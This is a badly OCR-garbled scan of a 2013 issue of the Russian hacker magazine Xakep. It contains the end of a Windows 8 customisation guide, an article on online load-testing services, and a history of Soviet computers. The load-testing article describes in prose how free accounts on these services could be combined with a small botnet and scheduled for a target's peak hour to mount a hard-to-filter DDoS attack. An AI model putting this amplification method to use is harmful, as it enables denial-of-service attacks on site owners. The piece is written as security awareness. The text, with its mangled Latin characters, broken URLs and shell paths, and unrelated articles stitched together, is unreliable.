фейс проводника и Іпіегпеі Ехріогег. 

Во время установки (рис. 11) можно выбрать, 
какие компоненты установить. По умолчанию 



устанавливаются классические интерфейсы 
для проводника, меню «Пуск» и ІЕ (ІЕЮ становит- 
ся похож на ІЕ9), а также обновление самой про- 
граммы СІаззіс ЗІіеІІ. 

После установки на панель задач будет добав- 
лена кнопка «Пуск», при первом нажатии на кото- 
рую ты сможешь выбрать скин для главного меню. 
Доступны скины в стиле ѴѴіпсІоѵѵз ХР, ѴѴіпсІоѵѵз 7 
и классическое меню (рис. 13). 

Само же главное меню, создаваемое про- 
граммой СІаззіс ЗІіеІІ, изображено на рис. 12. 
Важнее всего в нем то, что оно на русском язы- 
ке: твои дедушка и бабушка будут тебе благо- 
дарны! 

А на рис. 14 показано, как будет выглядеть 
проводник после установки этой программы. Вот 
только с ІЕЮ у меня не сложилось — почему-то 
он не стал выглядеть, как ІЕ9, притом что над- 
стройку СІаззіс ЗІіеІІ я активировал. Может, это 
глюк сугубо в моей системе, уставшей от посто- 
янных издевательств, а может, глюк самой СІаззіс 
ЗІіеІІ. Разбираться я не стал, так как использую 
Соодіе СІіготе. 

Для кастомизации самого меню щелкни пра- 
вой кнопкой мыши на новой кнопке «Пуск» и вы- 
бери команду «Настройка». В появившемся окне 
(рис. 15) на вкладке Зіагі Мепи Зіуіе можно вы- 
брать стиль главного меню, как уже было показа- 
но, на вкладке Вазіс Зеіііпдз — основные параме- 



тры, в том числе и реакцию на нажатие клавиши 
ѴѴіпсІоѵѵз, а на вкладке Зкіп — параметры самой 
темы оформления. 

Программа СІаззіс ЗІіеІІ тоже не идеальна. Да, 
ее меню на русском языке, но локализирована 
она не окончательно — окно настроек все еще 
на английском. Да и с классическим интерфейсом 
для ІЕу меня ничего не получилось. 

ДРУГИЕ «НАПИЛЬНИКИ» 

Без преувеличения могу сказать, что программа 
ѴіЗіагі умеет делать все, что нужно: отключать 
Меіго, создавать меню «Пуск», «убивать» горячие 
углы, организовывать нормальный поиск. Но есть 
и другие программы. Все программы подобно- 
го рода описывать в статье не стану, ты можешь 
по моей наводке попробовать их самостоятельно. 
В таблице 1 приведены различные задачи и про- 
граммы, с помощью которых их можно решить. 
А во врезке ты найдешь сайты, где можно скачать 
эти программы. Сразу скажу: в таблицу вошли 
только бесплатные. Не думаю, что ты захочешь 
на них тратиться. 

Конечно, в Сети можно найти и много других 
«напильников», даже самых бесполезных. На- 
пример, есть программа, возвращающая старый 
диспетчер задач в ѴѴіпсІоѵѵз 8, но зачем это делать, 
я не понимаю, ведь новый на две головы выше 
старого! 






Рис. 8. О том, какзапустить Меіго 



Рис. 9. Параметры ѴіЗіагі 



Рис. 10. Меню «Пуск» в стиле 
ѴѴіпсІоѵѵз 7 
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СІаззіс 5МеМ: 

ѵѵѵѵѵѵ.сіаззісзііеіі.пеі 

РіЬЬоп РізаЫегІог 
ѴѴіпсІоѵѵз 8: 

ѵѵіпаего.сот/сіоѵѵпіоасі. 

р!ір?ѵіеѵѵ.18 

РрккіѴѴіп8зіагітепи: 

ШрзѴ/ѵѵѵѵѵѵ.роккі.сот/ 

ѵѵіпсІРѵѵз-8-зіагі-тепи 

ЗкірМеІгс: 

ѵѵіпаеге.сет/ссттепЕ 

р!ір?срттепі.пеѵѵз.103 

ѴіЗіагі: 

Іее-зріі.срт/ѵізіагі 



Рис. 11 . Установка программы СІаззіс ЗИеІІ 



Рис. 12. Главное меню, создаваемое программой 
СІаззіс Зііеіі 



© ЗеНіпдз Тог СІаззіс 51аП Мели 3.6.7 ІіОІ 
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(•) Ва 5 Іс 5 ейіпд 5 

О АН ВеКіпдх 



| Васкир ▼[ | ОК СапсеІ 




Рис. 13. Выбор типа меню 



Рис. 14. Классический проводник 



ЗАПУСК МЕТПО-ПРИЛОЖЕНИЙ 
С РАБОЧЕГО СТОЛА 

Есть возможность запуска Меіго-приложений 
прямо с рабочего стола! Только в этом случае 
нет никаких «напильников», а «пилить» придется 
вручную. 

Чтобы твои Меіго-приложения были доступны 
на рабочем столе, просто создай ярлык для сле- 
дующего расположения: 

%ыіпс!іг%ехр1огег .ехе б И е 1 1 : : :<-■ 
І4234сІ49Ь-0245-4сИ : 3-Ь780-389394345бе1> 

Или просто для 

с : ХыіпсІоызХехрІогег .ехе зііеіі: : :<-■ 
І4234сІ49Ь-Ѳ245-4сІ-РЗ-Ь78Ѳ-389394345бе1> 

После создания щелкни по ярлыку, и ты увидишь 
в окне проводника твои приложения. 

Конечно, чуда не произойдет и приложение 
не откроется в отдельном окошке, а будет запу- 
щено в полноэкранном режиме. А если хочешь, 
чтобы они запускались в отдельном окне, тогда 
нужно установить программу ВеІгоІІІ ( геігоиі. 
сот ), за которую придется заплатить пять баксов. 



В чем же тогда прелесть этого совета, если 
приложения все равно запускаются в полно- 
экранном режиме? Ты экономишь одно пере- 
ключение на экран Меіго, ведь приложения запу- 
скаются непосредственно с рабочего стола. Если 
они тебе все-таки нужны, то такой режим, как мне 
кажется, лучше. 

ОТКЛЮЧЕНИЕ ЭКРАНА БЛОКИРОВКИ 

Есть еще одна функция в ѴѴіпсІоѵѵз 8, которая мне 
не нравится, — это экран блокировки. Я согласен, 
что она нужна для планшетов, но на ноутбуках 
и стационарниках, не оснащенных сенсорным 
экраном, она бесполезна. Какой смысл разбло- 
кировать экран мышкой, а потом еще и вводить 
пароль? Правильно, никакого! Поэтому данную 
функцию нужно отключить. 

Для этого потребуется выполнить следующие 
действия: 

• Нажми <ѴѴіп + В>, введи команду дресііімтізс 
и нажми <Епіег>. 

• Перейди в «Конфигурация компьютера — ► Ад- 
министративные шаблоны — > Панель управле- 
ния — ► Персонализация». 

• Включи политику «Запрет отображения экра- 
на блокировки». 



ВМЕСТО ЗАКЛЮЧЕНИЯ 

В этой небольшой статье мы «привели в чувства» 
твою ѴѴіпсІоѵѵз 8. Я надеюсь, что во время экспе- 
риментов она не упала и с ее здоровьем все в по- 
рядке. Во всяком случае с моей «восьмеркой» все 
было нормально — она жива и здорова. 

Если будут вопросы, замечания и пожелания, 
меня всегда можно найти на форуме сайта ѵѵѵѵѵѵ. 
сікѵуз.ога.иа . НЕ 




Рис. 15. Настройки программы СІаззіс ЗІіеІІ 









Нагрузочное тестирование аз а зегѵісе 

Вначале были веб-приложения, которые предоставляли инфор- 
мацию пользователям Сети. Потом появились сервисы, которые 
позволяли владельцам веб-приложений предсказать допустимую 
нагрузку. И с помощью этих сервисов придумали хакеры способ вы- 
вести любое веб-приложение за пределы допустимой нагрузки... 
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Л юбой веб-проект, будь то потерянный где-то в Сети 
блог или веб-приложение нового стартапа, имеет 
такую важную характеристику своей работоспособ- 
ности, как «предельная нагрузка». Эта метрика дает 
о себе знать, когда веб-приложение частично или полностью 
отказывается выполнять возложенные на него функции обра- 
ботки запросов от пользователей. Для кого-то из владельцев 
это может означать потерю аудитории, которая регулярно чита- 
ет его, а для кого-то — потерю клиентов, которые из-за нерабо- 
тоспособного веб-ресурса интернет-магазина решили купить 
товар у конкурента. 

Не всегда причиной отказа в обслуживании становится 
распределенная атака. Просто у каждого веб-ресурса есть 
предельное значение количества обрабатываемых пользова- 
телей. Этот факт заставил разработчиков и владельцев веб- 
приложений уделять особое внимание процедуре нагрузочного 
тестирования. 




СТРЕСС КАК СЕРВИС 

Десктопные приложения постепенно перебегают в облака, 
и браузер просто необходим любому уважающему себя интер- 
нет-пользователю. Концепция «ПО как сервис», с одной сторо- 
ны, облегчает нам жизнь. Не нужно заморачиваться над уста- 
новкой приложений, тратить гигабайты своего жесткого диска. 
Мы теперь совсем не привязаны к конкретной рабочей станции 
с фиксированным набором ПО — теперь любой девайс, имею- 
щий в своем арсенале веб-браузер, может стать фотошопом, 
средой разработки, блокнотом и трансформироваться во мно- 
гие другие приложения. 

С другой стороны, концепция работы с облачным програм- 
мным обеспечением таит в себе подводные камни. Во-первых, 
мы доверяем продукты своей облачной деятельности третье- 
му лицу. Доверяем ли мы ему? Вдруг он подсматривает наши 
фотографии или исходный код наших приложений, который мы 
у него храним? А может быть, он не следит за своей безопас- 
ностью и у любопытных умельцев есть возможность просма- 
тривать наши файлы (вспомним инцидент с ЭгорЬох). Однако 
речь не об этой стороне облачной концепции. На просторах 
Сети веб-сервисом стали совсем не безобидные приложения 
для нагрузочного и стресс-тестирования... 

РАЗВЕДКА БОЕМ 



поведения целевой системы при нагрузке, выходящей за рамки 
допустимого значения. Частный пример стрессового тестиро- 
вания информационной системы — ЭЭоЗ-атака на ее компо- 
ненты. 

Например, мы знаем, что наш блог может одновременно 
выдержать 1000 пользователей. Мы начинаем проверку и ими- 
тируем активность 50 пользователей, затем 100 и, наконец, 900. 
Мы занимаемся нагрузочным тестированием. Затем мы реши- 
ли проверить, как поведет себя блог, если его будут читать сра- 
зу 1050 пользователей, а это значит, что мы приступили к про- 
цедуре стрессового тестирования. 

Стрессовое тестирование помогает повысить уровень за- 
щищенности внешних ИТ-ресурсов целевой инфраструктуры 
и позволяет получить следующие результаты: 

1. Определить текущие предельные значения нагрузки 
на внешние сервисы. Если мы знаем точку отказа нашей 
информационной системы, то мы можем попробовать по- 
высить отказоустойчивость: оптимизировать имеющиеся 
процессы или внедрить новые. Другими словами — кто 
предупрежден, тот вооружен. 

2. Проверить устойчивость внешних сервисов к некоторым 
сценариям распределенных атак, направленных на отказ 
в обслуживании. Взглянув на свой проект глазами зло- 
умышленника, мы можем делать прогнозы «черных дней» 
для своего бизнеса либо развернуть превентивную защиту 
под наши потребности. 

Оценить эффективность средств защиты от ЭЭоЗ-атак 
при реализации соответствующих сценариев распределен- 
ных атак. Например, жизнь заставила нас встать под защиту 
какого-нибудь сервис-провайдера Апіі-ЭЭоЗ, но мы хотим 
проверить, действительно это эффективная мера или же пу- 
стая трата бюджета. ЭЭоЗ — ответ на наш вопрос. 

Сделать противодействие данному типу угроз эффектив- 
нее и подготовить себя и своих коллег к взаимодействию 
в ходе ЭЭоЗ-атаки. В данном случае нагрузочное и стресс- 
тестирование дают ответы на вопросы «Кажется, наш сервис 
загибается... Что делать?» или «Нас атакуют! Что делать?». 
Разработать рекомендации по повышению защищенности 
от ОЭоЗ-атак. 

В отличие от других этапов разработки веб-проекта, будь 
то отладка приложения или его функциональное тестирование 
(проверка работоспособности его функционала), нагрузочные 
тесты имеют ряд особенностей, которые делают их реализацию 
нетривиальной задачей. Во-первых, тесты проводятся на ре- 
альной информационной системе, которая может находиться 
в процессе функционирования. Согласись, тестировать макет 
никому не интересно (если только процедура тестирования 
не является частью процесса разработки высоконагруженно- 
го проекта), куда лучше получить картину производительности 
живого «образца». В свою очередь, прогруз действующего про- 
екта может стать причиной временного прекращения какого-то 
бизнес-процесса, а это значит, что мы можем получить самый 
настоящий отказ в обслуживании со всеми вытекающими. 

Во-вторых, сценарии проведения стресс-тестов могут 
включать в себя нагрузку, которая имитирует действия зло- 
умышленников, но не ограничиваются ею. В этом случае мы по- 
лучаем более комплексную оценку нашей производительности, 
нежели оценку эффективности парочки ОЭоЗ-атак. 



Формально процедура нагрузочного тестирования является 
частью процедуры тестирования производительности — бо- 
лее комплексного теста, в который также входит стресс- 
тестирование. В свою очередь, стресс-тестирование — оценка 



Конфигурация нагру- 
зочного тестирования 
в проекте І-оасІ Ітрасі 



ф 1_ОАО ІМГАСТ 



Сгеаіе сопЛ§игаЦоп 



Тем сопПдшаіюп лате 
Му (е»( сопіідигаііоп 
Тагдеі 1Ж1 



- 1.оасІ ехесиііоп ріап 



аі Іізегз (ѴУз) • Зшіиіаіео Вготгеег ІІзегз (ЗВІІз; 




- Цзег зсепагіоз 



АНосаІкмі Ч іоай гопе 
100 % АМіЬигп. ІІБ (Аіпагоп) [г] ІАиіо депегаіе чье г асвп РП со Ме« изег 



зсепало Ѵіем/Е<Ж изег зсепзпо 



Интерфейс системы 
нагрузочного тестиро- 
вания ЛѴІеІег 




4 6 



рсгоыЕ 



ХАКЕР 08 /175/ 2013 



Отчет о процедуре на- 
грузочного тестирова- 
ния, предоставляемый 
сервисом ВІагеМеіег 
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ПЕРФОМАНС НА СЦЕНЕ ѴѴЕВ 

Задача: создать контролируемую нагрузку на сервис, которая 
также должна превысить текущее значение предельной (если 
только мы не хотим заниматься прогнозированием точки отказа 
нашего сервиса). 

Решение: нетривиальное. Можно попросить владельца по- 
сещаемого веб-проекта сделать редирект его пользователей 
на наш ресурс. В таком случае нужно найти доброго владель- 
ца, у которого посещаемость проекта значительно превышает 
наши показатели. 

Можно настроить зіапсіаіопе-приложение вроде АрасНе 
ЛѴІеіег, написать для него сценарий поведения пользовате- 
ля и отправить бродить по нашему веб-приложению. Однако 
имитация сотни пользователей с локалхоста вряд ли создаст 
ощутимую нагрузку для более-менее серьезного приложения 
(если только мы грузим не свой блог на площадке Соодіе). В та- 
ком случае лучше раскидать этот скрипт по нескольким маши- 
нам или воспользоваться прелестями облачных ІааЗ-площадок 
вроде Атагоп ЕС2. Кстати, в нашем журнале был интересный 
материал на тему использования приложений для нагрузочного 
тестирования ( ѵѵѵѵѵѵ.хакер.ги/ро5І:/43327 ). 

То, что пять лет назад несло в себе ноу-хау, теперь становит- 
ся объектом археологии. Это касается и описанных выше спосо- 
бов тестирования производительности. Теперь концепция «АП аз 
а зегѵісе» позволяет владельцам веб-приложений не заморачи- 
ваться над настройкой сложных систем нагрузочного тестирова- 
ния, подготовкой облачной инфраструктуры и тому подобными 
действиями. Теперь уже все это сделано в бэкграунде и предо- 
ставляется как онлайн-сервис: залогинился на симпатичном 
веб-ресурсе, задал параметры нагрузки, оплатил вычислитель- 
ные мощности и знай себе фиксируй поведение своего веб- 
проекта. Кстати, для мониторинга состояния веб-ресурса также 
есть отличные веб-сервисы, но обо всем по порядку. 



ЮАОІМРАСТ 

Одним из первопроходцев в направлении сервисов нагру- 
зочного тестирования стал проект І_оасІ Ітрасі ПоасНтрасТ 
сот ). Теперь владельцу веб-ресурса, чтобы выяснить воз- 
можности своего детища, достаточно зарегистрироваться 
в этом проекте. Особо ленивым сервис предлагает момен- 
тальную проверку без регистрации, возможности которой 
не особо впечатляют, но позволяют быстро познакомиться 
с интерфейсом сервиса. Надо отметить, что даже бесплатная 
нагрузка оказала заметное влияние на время отклика моего 
блога, который «дрейфует» по инстансам амазоновского об- 
лака. 

За кулисами красивого интерфейса в глаза бросается 
потенциал, который открывается вместе с возможностями 
по конфигурированию процедуры нагрузочного тестирова- 
ния. Здесь можно задать как основные параметры нагрузки 
(количество пользователей, максимальный интервал време- 
ни для их подключения, привязка ІР-адресов), так и допол- 
нительные (географическое распределение пользователей, 
их сценарий работы с веб-приложением, агенты для изме- 
рения показателей работоспособности приложения и так 
далее). 

Особенно радует гибкая система вывода результатов те- 
стирования. Графическое представление огромного числа 
метрик позволяет получить детальную и наглядную отчет- 
ность о процессе. 

Прайс-лист для нагрузочного тестирования в рамках сер- 
виса І_оасІ Ітрасі: позволяет за 225 долларов генерировать 
нагрузку, эквивалентную показателю посещаемости нашего 
проекта в 100 тысяч посетителей в месяц. Дорого, но оценить 
возможности сервиса можно в тестовом режиме, который 
позволяет имитировать посещаемость в 10 тысяч пользова- 
телей в месяц. Стоит отметить, что даже бесплатная нагруз- 



Отчет о нагрузоч- 
ном тестировании 
веб-приложения с 
помощью сервиса І-оасІ 
Ітрасі 



Конечно, можно настро- 
ить віапйаіопе-приложение 
вроде Араске ]Меіег, но 
имитация сотни пользова- 
телей с локалхоста вряд ли 
создаст ощутимую нагрузку 
для серьезного приложения 
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Распределение времени загрузки контента в ходе нагрузочного 
тестирования (І-оасІ Ітрасі) 




Нагрузочное тестирование веб-ресурса «без регистрации и 5М5» 
при помощи сервиса І-оасІсІу 

ка в 50 пользователей позволила за трехминутный интервал 
заметить аномалии в поведении системы дистанционного 
банковского обслуживания небольшого банка. Зафиксируем 
факт генерации нагрузки с помощью І_оасІ Ітрасі в рамках 
демонстрационных возможностей и перейдем к следующему 
сервису. 

ВІ.А2ЕМЕТЕП 

«ЛѴІеІег аз а зегѵісе» — говорят о своем проекте создатели. 
Концепция действительно простая: берем ЛѴІеІег, раскиды- 
ваем его по инстансам облачной инфраструктуры Атагоп 
ЕС2 и делаем фронтенд, который позволит нашим пользо- 
вателям готовить сценарии тестов, оплачивать нагрузку и на- 
слаждаться отчетами. 

Не перегруженный пестрыми элементами веб-интерфейс 
за своей простотой скрывает весь необходимый функционал 
для организации нагрузочного тестирования. «Под капотом» 
у ВІагеМеІег прячется пул амазоновских инстансов, которые 
разработчики сервиса предоставляют своим пользователям. 
Гибкая система отчетов позволяет максимально детально 
проанализировать каждую секунду процедуры тестирования 
и получить картину поведения целевой информационной си- 
стемы. 

Инициализацию нагрузки можно проводить по распи- 
санию, что наталкивает на мысль о возможности активации 
данного сервиса в час пик приложения-жертвы. 

Здесь мы также видим гибкую тарификацию в зависимо- 
сти от потребности клиента. За 40 тысяч пользователей (при 
максимальном количестве ІР-адресов 40 штук) придется от- 
дать около 299 долларов. 

В рамках бесплатной демонстрации возможностей серви- 
са предоставляется базовая нагрузка из 1000 одновременно 
подключенных пользователей. «Маленький ботнет» — вновь 
промелькнула мысль, которую мы зафиксируем. 31 



И ИМ ПОДОБНЫЕ 

Пробежимся по функционалу еще нескольких сервисов нагрузочного тести- 
рования. 

• І-оасІ Зіогт. И вновь за красивым интерфейсом онлайн-сервиса прячется 
облачная инфраструктура, с набором ПО для генерации нагрузки. После 
регистрации І_оасІ 51:огт предлагает создать новый план нагрузочного 
теста. В этот план входит определение (запись) шагов манипуляций с це- 
левым веб-ресурсом. Так, тест может состоять из одного шага — открытия 
главной веб-страницы. 

Что примечательно, так это процедура верификации всех проверяемых 
сервисом проектов. Вдруг пользователь І_оасІ Віогт хочет вывести из строя 
сайт конкурента. Для того чтобы пройти процедуру верификации, пользо- 
вателю требуется разместить на целевом веб-ресурсе специальный файл 
с кодом, прочитав который проект І_оасІ Зіогт поверит, что его пользова- 
тель действительно владелец проверяемой системы. 

• Ьоасісіу. Еще один представитель онлайн-проектов, которые позволяют 

в экспресс-режиме осуществить нагрузочное тестирование без регистра- 
ции. Помимо этого, сервис предлагает зарегистрированным пользовате- 
лям бесплатные проверки, в которых обещается до 100 активных посетите- 
лей. 



ОБРАТНАЯ СТОРОНА МЕДАЛИ 

Теперь попробуем взглянуть на концепцию нагрузочного тестирования и он- 
лайн-сервисов с позиции злоумышленника. Представим, что у атакующего 
нет своего веб-ресурса, который приносит доход, его не волнует этическая 
сторона распределенных атак, направленных на отказ в обслуживании, в его 
словарном запасе вообще нет понятий «этика» и «мораль». Есть только страст- 
ное желание вынести веб-ресурс конкурента за пределы онлайна. 

Вариантов достижения цели достаточно. Можно сломать дюжину посещае- 
мых веб-ресурсов и поставить редирект на целевой сайт, но это удовольствие 
будет длиться недолго, так как такой трафик легко блокируется на уровне 
правил файрвола, да и процедура компрометации нескольких посещаемых 
проектов может затянуться. 

Злоумышленник может заказать ООоЗ-атаку у владельца ботсети. Стоит 
эта услуга не очень дорого (около 15 долларов в час за 4-гигабитную нагрузку), 
что делает ее легкодоступной. Однако стоит помнить, что объем дешевенького 
ботнета может не дать нужного эффекта, если целевой веб-ресурс рассчитан 
на большую аудиторию. Также задачу осложняет то, что ООоЗ-атака может 
использовать сценарии, которые легко фильтруются различными АпІі-ООоЗ 
средствами. 

Наиболее эффективной будет такая ОРоЗ-атака, при которой отличить 
легитимный трафик от нелегитимного (генерируемого ботами) практически 
невозможно. Достаточно представить, что количество читателей блога возрос- 
ло со ста человек в день до ста тысяч и при этом все ведут себя, как положено 
рядовому пользователю, — тратят время на «ознакомление» с содержимым 
страницы, пытаются писать комментарии, просматривают картинки и при этом 
географически независимы друг от друга. Как тут не подготовленному к тако- 
му повороту событий владельцу ресурса понять, кто свой, а кто чужой? 

Каждый из онлайн-сервисов нагрузочного тестирования, которые мы рас- 
смотрели, по своей сути является ботнетом. Легкость определения поведения 
каждого бота, простота и понятность в сочетании с пулом вычислительных 
ресурсов — вот что отличает такую бот-сеть от бот-сетей, использующих 
традиционные сценарии РОоЗ-атак и предоставляемых на черном рынке 
киберпреступности. Конечно, дорогие тарифы не позволяют серьезно от- 
носиться к угрозе, которая может исходить от онлайн-сервисов нагрузочного 
тестирования. Давайте посмотрим, как легко можно превратить процедуру 
нагрузочного тестирования в стресс-тест с успешными результатами. 

Проектов, подобных І_оасІ Ітрасі, огромное множество, и большинство 
из них предоставляют свои ресурсы пусть в очень ограниченном, но дееспо- 
собном и бесплатном варианте. Чего стоит, например, на том же І_оасІ Ітрасі 
поднять несколько независимых аккаунтов (привязка к телефонному номеру 
или кредитной карте не обнаружена ни на одном из описанных сервисов) 
и назначить им одно и то же время нагрузки на вражеский сайт? ВІагеМеІег 
официально поддерживает систему мультиаккаунтов. Некоторые проекты 
предоставляют демонстрационную нагрузку вообще без регистрации, а это 
может означать, что владелец какого-нибудь «ущербного» ботнета из 50-100 
зомби с помощью таких сервисов может в сотни раз увеличить эффектив- 
ность ООоЗ-атаки. Как? Все просто — на одного бота приходится десять не- 
зависимых запросов на нагрузочное тестирование в различные сервисы типа 
І_оасІ Ітрасі и І_оасІсІу. Те, в свою очередь, независимо друг от друга иницииру- 
ют сотни запросов. Результат: целевой ресурс задыхается от объемов вполне 
«легитимного» трафика. И все это «без регистрации и 5МЗ». 




Сцена 
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ВАСК 
Ш ТНЕ .311 

Как делали компьютеры в СССР 

В СССР копирование западных компьютеров было нормой. Так происходило 
не только с ІТ — вспомни хотя бы машины, игрушки, бытовую технику. Хорошо 
это или плохо — судить не нам. Куда интереснее изучать подводные течения, 
которые привели к появлению разнообразных и экзотических советских ПК. 

И конечно, предаваться ностальгии. 





Андрей Письменный 

арізтеппуѲдтаіІ.сот 



М ожно по-разному объяснять, почему Со- 
ветский Союз отставал от США в области 
компьютеростроения. Традиционно гово- 
рят, что кибернетику в пятидесятые считали 
продуктом «империалистической пропаганды» и дис- 
циплину объявили лженаукой. Как бы то ни было, руко- 
водство страны приняло компьютеры далеко не сразу, 
и волокита в утверждении разработок и принятии стан- 
дартов только помогла отставанию. Ситуацию несколь- 
ко спасало то, что в СССР не стеснялись заимствовать 
западные технологии и, когда возникала нужда и воз- 
можность клонировать иностранный компьютер, это 
делалось без особой оглядки на лицензии. 



У многих на слуху серия советских суперком- 
пьютеров ЕС ЭВМ, очень многое позаимствовавшая 
у системы ІВМ/360. Даже БЭСМ-6, считавшийся 
оригинальной разработкой, был вдохновлен амери- 
канским СЭС 1604. Но эти компьютеры видели лишь 
инженеры крупных предприятий. По-настоящему 
с компьютеризацией советские люди столкнулись 
в восьмидесятых годах, и вот тогда клоны букваль- 
но повалили. Их разнообразие было велико, и из- 
учать его можно очень долго. Мы же сосредоточимся 
на наиболее известных сериях советских компьюте- 
ров, которые можно было встретить в научных инсти- 
тутах и, позже, дома. 
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СМ ЭВМ 

(СИСТЕМА МАЛ ЫХЭВМ) 

Широко известно, что до того, как компьютеры приручили и одо- 
машнили, они были дикими и обитали в дебрях вычислительных 
центров. Предков современных машин принято делить на поколе- 
ния: первое строилось на лампах, второе появилось с переходом 
на транзисторы, а третье — результат изобретения микросхем. 

Компьютеры третьего поколения перестали занимать целые ком- 
наты и стали умещаться в шкафы, сравнимые по размерам с со- 
временными серверными стойками. То, что их при этом называли 
«мини-ЭВМ», сейчас не может не вызывать улыбку, но для своего 
времени даже такая миниатюризация была прорывом. 

В Соединенных Штатах первым коммерчески успешным ми- 
ни-компьютером стал РЭР-8 фирмы ЭЕС, выпускавшийся с 1965 
года. В СССР необходимость в более дешевых и миниатюрных 
системах, чем гигантские БЭСМ и ЕС ЭВМ, осознали только 
к середине семидесятых. РЭР-8 к тому моменту успел устареть, 
и за основу будущей серии малых электронно-вычислительных 
машин (СМ ЭВМ) взяли его наследник — РЭР-11 . 

За пятнадцать лет в Институте электронных управляющих машин (ИНЭУМ), где велась разработка СМ ЭВМ, успели освоить 
и другие архитектуры: когда на смену РЭР- 11 пришли компьютеры марки ѴАХ, то появились и их советские собратья СМ- 1700. Поз- 
же, с приходом микропроцессоров, модельный ряд СМ пополнился микрокомпьютерами — машинами, основанными на микро- 
процессорах, в том числе восьми- и шестнадцатиразрядных интеловских чипах (СМ- 1800 и СМ- 1810). Но самой распространенной 
моделью по-прежнему оставалась СМ-4, имевшая систему команд и шину передачи данных, очень близкие к РЭР-11 . 

СМ главным образом использовались на производстве и в энергетике — там они заменили специализированные контроллеры: 
в отличие от контроллера, компьютер можно в любой момент перепрограммировать, что дает намного большую гибкость. Впослед- 
ствии же оказалось, что мини-компьютеры нужны и в научных лабораториях, и в множестве других мест. Но интереснее всего, как по- 
пулярность СМ ЭВМ повлияла на зарождавшуюся в то время советскую индустрию микрокомпьютеров — в том числе и домашних. 



ДВК 

(ДИАЛОГОВЫЙ ВЫЧИСЛИТЕЛЬНЫЙ КОМПЛЕКС) 





Когда необходимость в настольных компьютерах общего назначения стала очевидной, научно-исследовательскому институту точных 
технологий (НИИТТ) было поручено начать разработку таких машин на основе шестнадцатиразрядного микропроцессора К1 801 ВМ 1 . 
Изначально планировалось пользоваться собственной архитектурой «Электроника НЦ», но, чтобы сохранить преемственность по от- 
ношению к СМ ЭВМ , был выбран чип, имевший схожую с ним систему команд. Воттолько типичный СМ ЭВМ был похож на приличных 
размеров шкаф, а «Диалоговый вычислительный комплекс 1 » скорее напоминал обычный ПК. 

Тактовая частота процессора ДВК-1 составляла 5 МГц, имелось 48 Кб оперативной памяти, два дисковода для 5,25-дюймовых 
дискет и алфавитно-цифровой терминал. Последнее означает всего лишь черно-зеленый монитор, не умеющий выводить ничего, 
кроме символов, — то есть никакой графики. Поддержки жестких дисков изначально не было, но в те времена умели обходить- 
ся без них: в один дисковод нужно было вставлять 
дискету с системой, загружать ее, а потом во вто- 
рой — дискету с программами, и только тогда при- 
ступать к работе. Если, конечно, одна из дискет 
вдруг не запаршивит. 

Чаще всего ДВК встречались в университетах 
и НИИ, но это вовсе не означает, что эти компьюте- 
ры не использовались в увеселительных целях, — 
еще как использовались! Совместимость с РЭР-11 
даже позволяла запускать добиравшийся до нас 
западный софт. Одной из самых знаменитых и ув- 
лекательных игр был 51:аг Тгек — тактические звезд- 
ные бои в квадратике восемь на восемь символов. 

ДВК совершенствовался на протяжении вось- 
мидесятых: менялся дизайн материнских плат (или 
«одноплатных вычислителей», как их тогда назы- 
вали), количество памяти росло, появились кон- 
троллеры жестких дисков и цветных графических 
дисплеев. Последний популярный ДВК за номером 
четыре имел целый мегабайт оперативной памяти, 
диск на 20 Мб и цветной экран. 




Сцена 
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В 1985 году в Советском Союзе решили серьезно взяться за ком- 
пьютеризацию школ. К тому времени разновидностей домашних 
компьютеров уже было пруд пруди, и соревнование за право 
компьютеризировать классы было еще более ожесточенным, 
чем недавняя борьба школьных дистрибутивов І_іпих. Разработ- 
чики «Микро-80» тоже не упустили возможности поучаствовать 
в конкурсе: РК86 срочно приспособили для серийного выпуска 
и использования в школах. Название составили из двух слов — 
«микрокомпьютер» и «школа», а затем решили стилизовать 
до «Микроши». 

Компьютер должен был быть максимально дешевым и про- 
стым — то есть одноплатным. Ради упрощения пришлось 
отказаться от некоторых возможностей, и совместимость 
с «Радио-86РК» оказалась неполной. Программ к тому же почти 
не было — для демонстрации написали только пару простейших 
игр. Тем не менее «Микрошу» решили запустить в серию, и в 1987 
году компьютер появился в продаже и начал поступать в школы. 
Те, кому довелось пользоваться «Микрошей», вспоминают 
об этом со смешанными чувствами. С одной стороны, роскоши никакой: неудобная клавиатура, на кото- 
рой то и дело нажимаются не те клавиши, и убогий псевдографический режим, с которым толком ничего 
интересного не сделаешь. С другой стороны — все те же слезы умиления и ностальгии. 



МИ КРОША 



РАДИО-86РК 

«Радио-86РК» (или, как его называли в народе, РК86) был продолжа- 
телем идей «Микро-80» и распространялся тем же способом — через 
журнал, а не через заводские линии. По сравнению с предшественни- 
ком он был куда проще в сборке: вместо 200 микросхем использова- 
лось всего 29. В остальном все было очень похоже — тот же процес- 
сор, еще меньший объем оперативной памяти (16 или 32 Кб) и 2 Кб 
ПЗУ. Доставать детали, паять, мастерить корпус и перебивать из жур- 
нала дампы ПЗУ по-прежнему приходилось самостоятельно. И конеч- 
но же, нужно было иметь магнитофон и отбивать телевизор у членов 
семьи, желавших смотреть на нем телепередачи. 




ішшппишѵцщ! 




БК 

(БЫТОВОЙ КОМПЬЮТЕР) 

Многие ли пользователи БК-0010 знают, что им довелось поработать с «правнуком» ЭЕС РЭР-11? 
Шестнадцатиразрядный микропроцессор К1801ВМ1 в середине восьмидесятых по-прежнему мас- 
сово производился в СССР и пользовался немалой популярностью. Также как ДВК стал преемником 
СМ ЭВМ, БК (бытовой компьютер) обязан своим устройством ДВК. 

Если «Микроша» создавался стихийно и добрался до массового потребителя только благодаря 
череде счастливых случайностей, то с БК все намного проще: его разработку заказали зеленоград- 
скому НИИТТ (на тот момент уже работавшему над ДВК), и в 1985 году завод в Павловском Посаде 
приступил к выпуску БК. 

По характеристикам БК-0010 мало чем отличался от других домашних компьютеров своей эпохи: 
3 МГц, 32 Кб оперативной памяти, еще столько же — ПЗУ и, конечно же, необходимость в магнитофоне 
и телевизоре. Но дьявол, как известно, в деталях, и на недостаток дьявольских черт БК-0010 не жа- 
ловался. Тут и контроллер клавиатуры, не поддерживавший одновременное нажатие клавиш, и вы- 
рвиглазный цветной видеорежим с четырьмя цветами, в число которых не входил белый (а входили 
зеленый, красный, синий и черный), и экзотический языкФОКАЛ, позаимствованный с РЭР-8 и отли- 
чавшийся от бейсика в основном тем, что команды в нем можно было обозначать одной первой буквой. 

Все это не помешало БК стать одним из наиболее популярных в СССР домашних компьютеров. 
Он выпускался вплоть до 1992 года, и за все время было произведено более 160 тысяч БК-0010/0011 . 




ХАКЕР 08 /175/ 2013 



